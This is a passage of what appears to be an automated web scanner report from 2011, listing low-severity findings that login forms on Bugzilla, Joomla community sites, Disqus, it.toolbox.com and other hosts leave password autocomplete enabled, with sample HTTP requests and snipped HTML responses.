Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:22 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 58445

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bug 378962 – firefox incorrectly decodeURI
...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi?id=378962" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>
<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>
<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

15.18. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Issue detail

The page contains a form with the following action URL:

https://bugzilla.mozilla.org/show_bug.cgi

The form contains the following password field with autocomplete enabled:

Bugzilla_password

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:20 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 11817

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>

...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>
<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>
<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

15.19. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Issue detail

The page contains a form with the following action URL:

https://bugzilla.mozilla.org/show_bug.cgi

The form contains the following password field with autocomplete enabled:

Bugzilla_password

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:20 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 11817

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>

...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>
<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>
<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

15.20. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Issue detail

The page contains a form with the following action URL:

https://bugzilla.mozilla.org/show_bug.cgi?id=378962

The form contains the following password field with autocomplete enabled:

Bugzilla_password

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:22 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 58445

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bug 378962 – firefox incorrectly decodeURI
...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi?id=378962" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>
<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>
<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

15.21. http://community.joomla.org/login.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/login.html

Issue detail

The page contains a form with the following action URL:

http://community.joomla.org/login.html

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.22. http://community.joomla.org/showcase/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/

Issue detail

The page contains a form with the following action URL:

http://community.joomla.org/showcase/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.23. http://community.joomla.org/showcase/how-to-submit-a-site.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/how-to-submit-a-site.html

Issue detail

The page contains a form with the following action URL:

http://community.joomla.org/showcase/how-to-submit-a-site.html

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.24. http://community.joomla.org/showcase/sites-of-the-month.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites-of-the-month.html

Issue detail

The page contains a form with the following action URL:

http://community.joomla.org/showcase/sites-of-the-month.html

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites-of-the-month.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.25. http://community.joomla.org/showcase/sites/advsearch.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites/advsearch.html

Issue detail

The page contains a form with the following action URL:

http://community.joomla.org/showcase/sites.html

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.26. http://community.joomla.org/showcase/sites/new.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites/new.html

Issue detail

The page contains a form with the following action URL:

http://community.joomla.org/showcase/sites.html

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.27. http://community.joomla.org/user-groups.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/user-groups.html

Issue detail

The page contains a form with the following action URL:

http://community.joomla.org/user-groups.html

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.28. http://demo16.cloudaccess.net/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://demo16.cloudaccess.net
Path:	/

Issue detail

The page contains a form with the following action URL:

http://demo16.cloudaccess.net/index.php

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.29. http://demo16.cloudaccess.net/administrator/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://demo16.cloudaccess.net
Path:	/administrator/index.php

Issue detail

The page contains a form with the following action URL:

http://demo16.cloudaccess.net/administrator/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /administrator/index.php HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.30. http://disqus.com/profile/login/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://disqus.com
Path:	/profile/login/

Issue detail

The page contains a form with the following action URL:

https://secure.disqus.com/profile/login/?next=http://disqus.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET /profile/login/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:33 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Length: 6310
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut
...[SNIP]...
</h3>


<form id="login-form" action="https://secure.disqus.com/profile/login/?next=http://disqus.com/" method="post" accept-charset="utf-8">
   <label>
...[SNIP]...
</span>
       <input type="password" name="password" tabindex="21" />
   </label>
...[SNIP]...

15.31. http://docs.joomla.org/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

http://docs.joomla.org/index.php?title=Special:UserLogin&action=submitlogin&type=signup&returnto=Main_Page

The form contains the following password fields with autocomplete enabled:

wpPassword
wpRetype

Request

Response

15.32. http://extensions.joomla.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://extensions.joomla.org/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.33. http://extensions.joomla.org/extensions previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions

Issue detail

The page contains a form with the following action URL:

http://extensions.joomla.org/extensions

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /extensions HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.34. http://extensions.joomla.org/extensions/advanced-search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/advanced-search

Issue detail

The page contains a form with the following action URL:

http://extensions.joomla.org/extensions

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /extensions/advanced-search HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.35. http://extensions.joomla.org/extensions/languages/translations-for-joomla previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/languages/translations-for-joomla

Issue detail

The page contains a form with the following action URL:

http://extensions.joomla.org/extensions

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /extensions/languages/translations-for-joomla HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.36. http://extensions.joomla.org/extensions/new previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/new

Issue detail

The page contains a form with the following action URL:

http://extensions.joomla.org/extensions

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /extensions/new HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.37. http://fastdial.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fastdial.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.38. http://fastdial.com/0 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fastdial.com
Path:	/0

Issue detail

The page contains a form with the following action URL:

http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.39. http://fastdial.com/user previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fastdial.com
Path:	/user

Issue detail

The page contains a form with the following action URL:

http://fastdial.com/user

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 4772
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="clear-block">
<form action="/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

15.40. http://fastdial.com/website previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fastdial.com
Path:	/website

Issue detail

The page contains a form with the following action URL:

http://fastdial.com/website?destination=website

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.41. http://fastdial.com/welcome-fast-dial-firefox-4 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fastdial.com
Path:	/welcome-fast-dial-firefox-4

Issue detail

The page contains a form with the following action URL:

http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.42. http://forum.joomla.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://forum.joomla.org/ucp.php?mode=login&sid=3b5661e788faab67f2027dc376b326d5

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.43. http://forum.joomla.org/ucp.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/ucp.php

Issue detail

The page contains a form with the following action URL:

http://forum.joomla.org/ucp.php?mode=login&sid=19d91383ba404ea6abc69bff18558c0e

The form contains the following password field with autocomplete enabled:

password

Request

GET /ucp.php HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.44. http://forum.joomla.org/viewforum.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.joomla.org
Path:	/viewforum.php

Issue detail

The page contains a form with the following action URL:

http://forum.joomla.org/ucp.php?mode=login&sid=37cbf4e15f54f7989d066007eee62641

The form contains the following password field with autocomplete enabled:

password

Request

GET /viewforum.php?f=511 HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.45. http://forumas.lithuanianjoomla.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forumas.lithuanianjoomla.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://forumas.lithuanianjoomla.com/ucp.php?mode=login&sid=6bb0e598b965dee060e98ad373f62147

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: forumas.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.46. http://forums.freebsd.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forums.freebsd.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://forums.freebsd.org/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

GET / HTTP/1.1
Host: forums.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.47. http://help.tweetmeme.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.48. http://help.tweetmeme.com/2009/04/07/api-documentation/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/07/api-documentation/

Issue detail

The page contains a form with the following action URL:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /2009/04/07/api-documentation/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.49. http://help.tweetmeme.com/2009/04/09/rss-feeds/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/rss-feeds/

Issue detail

The page contains a form with the following action URL:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /2009/04/09/rss-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.50. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/twitter-feeds/

Issue detail

The page contains a form with the following action URL:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /2009/04/09/twitter-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.51. http://help.tweetmeme.com/contact/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/contact/

Issue detail

The page contains a form with the following action URL:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /contact/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.52. http://help.tweetmeme.com/forum/forum/33 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/forum/forum/33

Issue detail

The page contains a form with the following action URL:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /forum/forum/33 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.53. http://help.tweetmeme.com/language/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/language/

Issue detail

The page contains a form with the following action URL:

http://help.tweetmeme.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /language/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.54. http://it.toolbox.com/blogs/database-soup previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-soup

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/database-soup

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.55. http://it.toolbox.com/blogs/database-talk previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-talk

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/database-talk

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.56. http://it.toolbox.com/blogs/db2luw previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2luw

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/db2luw

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.57. http://it.toolbox.com/blogs/db2zos previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2zos

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/db2zos

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.58. http://it.toolbox.com/blogs/elsua previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/elsua

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/elsua

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.59. http://it.toolbox.com/blogs/juice-analytics previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/juice-analytics

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/juice-analytics

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.60. http://it.toolbox.com/blogs/minimalit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/minimalit

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/minimalit

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.61. http://it.toolbox.com/blogs/penguinista-databasiensis previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/penguinista-databasiensis

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/penguinista-databasiensis

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.62. http://it.toolbox.com/blogs/ppmtoday previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/ppmtoday

Issue detail

The page contains a form with the following action URL:

http://it.toolbox.com/blogs/ppmtoday

The form contains the following password field with autocomplete enabled:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.63. http://joomlacode.org/gf/account/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/account/

Issue detail

The page contains a form with the following action URL:

http://joomlacode.org/gf/account/?action=UserAddAction

The form contains the following password fields with autocomplete enabled:

password
password_confirm

Request

Response

15.64. http://my.joomla.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://my.joomla.org/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: my.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.65. http://netvouz.com/action/submitBookmark previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://netvouz.com
Path:	/action/submitBookmark

Issue detail

The page contains a form with the following action URL:

http://netvouz.com/action/submitBookmark

The form contains the following password field with autocomplete enabled:

password

Request

GET /action/submitBookmark HTTP/1.1
Host: netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.66. http://newsguy.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsguy.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://newsguy.com/javascript:LoginNow()

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.67. http://people.joomla.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://people.joomla.org/people.html

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>

<form action="/people.html" method="post" name="login" id="form-login" >
<label>
...[SNIP]...
